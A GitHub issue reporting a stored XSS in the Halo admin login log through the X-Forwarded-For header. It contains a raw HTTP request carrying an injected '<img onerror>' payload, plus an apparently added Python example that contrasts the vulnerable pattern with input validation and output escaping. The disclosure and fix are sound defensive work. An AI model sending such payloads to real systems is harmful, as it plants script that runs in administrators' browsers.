There is a stored XSS vulnerability #126

Closed
4 of 6 tasks
Artemis1029 opened this issue Apr 4, 2019 · 2 comments
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability

Comments

@Artemis1029

Artemis1029 commented Apr 4, 2019

I confirm that I have already checked (mark with [ ] / [x])


I am requesting (mark with [ ] / [x])

  • Bug report
  • A new feature or functionality
  • Technical support

Bug Report

In issue 9, someone reported two stored XSS vulnerabilities, and you have fixed them, but the second XSS still has another output point: X-Forwarded-For.
Payload HTTP request:

POST /admin/getLogin HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2

loginName=asas&loginPwd=asas

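The report above shows the two ingredients of this class of bug: the value recorded as the "client IP" is taken from X-Forwarded-For, a request header the client writes freely, and that stored value is later rendered into the admin page without HTML encoding, so anyone who can trigger a login attempt can plant markup that runs when an administrator views the log. The following is an added, language-agnostic illustration written for this page; it is not Halo's code and does not reproduce its classes or templates. The function names (`client_ip`, `record_login_*`, `render_rows_*`), the constructed request headers and the `10.0.0.5` peer address are assumptions made for the example. It validates the header strictly as an IP address before storage and, independently, HTML-escapes every stored value at the output sink, which is the fix that survives a "second output point" being added later.

```python
"""Added example (not Halo's code): handling X-Forwarded-For safely.

Demonstrates the vulnerable pattern from the report (raw header stored as
the IP, rendered unescaped) beside a hardened version.
"""
import html
import ipaddress
from typing import Dict, List

# Payload from the report above, kept verbatim for the demonstration.
PAYLOAD = "127.<img src=1 onerror=alert(123)>0.0.2"


def client_ip(headers: Dict[str, str], remote_addr: str,
              behind_trusted_proxy: bool) -> str:
    """Return the address to record for a login attempt.

    X-Forwarded-For is fully attacker-controlled unless a proxy you operate
    overwrites it, so: (1) ignore it unless the app is known to sit behind
    such a proxy, (2) take only the first hop, and (3) require that hop to
    parse as an IPv4/IPv6 address. Any failure falls back to the TCP peer
    address, so free-form text never reaches storage.
    """
    if not behind_trusted_proxy:
        return remote_addr
    xff = headers.get("X-Forwarded-For")
    if not xff:
        return remote_addr
    first_hop = xff.split(",", 1)[0].strip()
    try:
        return str(ipaddress.ip_address(first_hop))
    except ValueError:
        # Not an IP address (e.g. the HTML payload above): refuse it.
        return remote_addr


def record_login_vulnerable(log: List[Dict[str, str]], headers: Dict[str, str],
                            remote_addr: str, user: str) -> None:
    """The pattern in the report: the raw header value is stored as the IP."""
    log.append({"user": user, "ip": headers.get("X-Forwarded-For", remote_addr)})


def record_login_hardened(log: List[Dict[str, str]], headers: Dict[str, str],
                          remote_addr: str, user: str,
                          behind_trusted_proxy: bool = True) -> None:
    """Store only a validated IP address (assumed: app is behind a proxy)."""
    log.append({"user": user, "ip": client_ip(headers, remote_addr, behind_trusted_proxy)})


def render_rows_vulnerable(log: List[Dict[str, str]]) -> str:
    """Stored XSS sink: values interpolated into HTML without escaping."""
    return "".join(f"<tr><td>{e['user']}</td><td>{e['ip']}</td></tr>" for e in log)


def render_rows_hardened(log: List[Dict[str, str]]) -> str:
    """Output encoding at the sink, independent of input validation, so a
    new output point for an already-stored value cannot reintroduce the bug."""
    return "".join(
        f"<tr><td>{html.escape(e['user'])}</td><td>{html.escape(e['ip'])}</td></tr>"
        for e in log
    )


def demo():
    """Run both paths over a constructed request carrying the payload."""
    headers = {"X-Forwarded-For": PAYLOAD}  # constructed, mirrors the report
    bad: List[Dict[str, str]] = []
    good: List[Dict[str, str]] = []
    record_login_vulnerable(bad, headers, "10.0.0.5", "asas")
    record_login_hardened(good, headers, "10.0.0.5", "asas")
    return render_rows_vulnerable(bad), render_rows_hardened(good)


if __name__ == "__main__":
    vulnerable_html, hardened_html = demo()
    print("vulnerable:", vulnerable_html)
    print("hardened:  ", hardened_html)
```

Two points a practitioner should keep separate: the IP validation removes the payload from storage, but escaping at render time is what closes the "another output point" hole this issue is about, because a template added later will otherwise print whatever is already in the database. If the application is not actually behind a proxy you control, X-Forwarded-For should be ignored altogether (`behind_trusted_proxy=False`), since anyone can send it.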

@ruibaby
Member

ruibaby commented Apr 4, 2019

@Artemis1029 OK, we will deal with this issue as soon as possible. Thank you very much for your feedback.

@ruibaby ruibaby added the kind/bug Categorizes issue or PR as related to a bug. label Apr 4, 2019
@JohnNiang JohnNiang added the vulnerability Vulnerability label Apr 4, 2019
@ruibaby
Member

ruibaby commented May 28, 2019

We are preparing to release v1, so this issue is being closed.

@ruibaby ruibaby closed this as completed May 28, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
3 participants